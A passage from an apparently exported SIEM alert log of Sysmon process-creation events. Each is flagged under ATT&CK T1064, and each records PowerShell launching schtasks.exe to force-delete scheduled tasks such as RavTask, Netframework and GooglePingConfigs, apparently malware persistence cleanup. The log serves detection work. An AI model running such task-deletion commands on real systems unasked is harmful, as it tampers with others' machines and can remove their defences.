Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.886",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.406 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00109af12b00} +ProcessId: 7760 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN MiscfostNsi /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.408886100Z"",""eventRecordID"":""3327"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.406\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00109af12b00}\r\nProcessId: 7760\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.406"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-00109af12b00}"",""processId"":""7760"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN MiscfostNsi /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.864",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.384 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010f6ef2b00} +ProcessId: 6340 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN HomeGroupProvider /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.386038700Z"",""eventRecordID"":""3326"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.384\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010f6ef2b00}\r\nProcessId: 6340\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.384"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-0010f6ef2b00}"",""processId"":""6340"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HomeGroupProvider /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.828",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.359 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-001068ee2b00} +ProcessId: 6016 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN GooglePingConfigs /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.371761100Z"",""eventRecordID"":""3325"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.359\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-001068ee2b00}\r\nProcessId: 6016\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.359"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-001068ee2b00}"",""processId"":""6016"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN GooglePingConfigs /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.827",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.286 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00104eec2b00} +ProcessId: 1520 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN RavTask /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.290943500Z"",""eventRecordID"":""3324"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.286\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00104eec2b00}\r\nProcessId: 1520\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.286"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-00104eec2b00}"",""processId"":""1520"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN RavTask /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.823",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.240 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010a9ea2b00} +ProcessId: 4732 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Flash /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.244028000Z"",""eventRecordID"":""3323"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.240\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010a9ea2b00}\r\nProcessId: 4732\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.240"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-0010a9ea2b00}"",""processId"":""4732"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Flash /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.717",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.211 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00101ae92b00} +ProcessId: 7824 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Netframework /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.225788000Z"",""eventRecordID"":""3322"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.211\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00101ae92b00}\r\nProcessId: 7824\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.211"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-00101ae92b00}"",""processId"":""7824"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Netframework /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 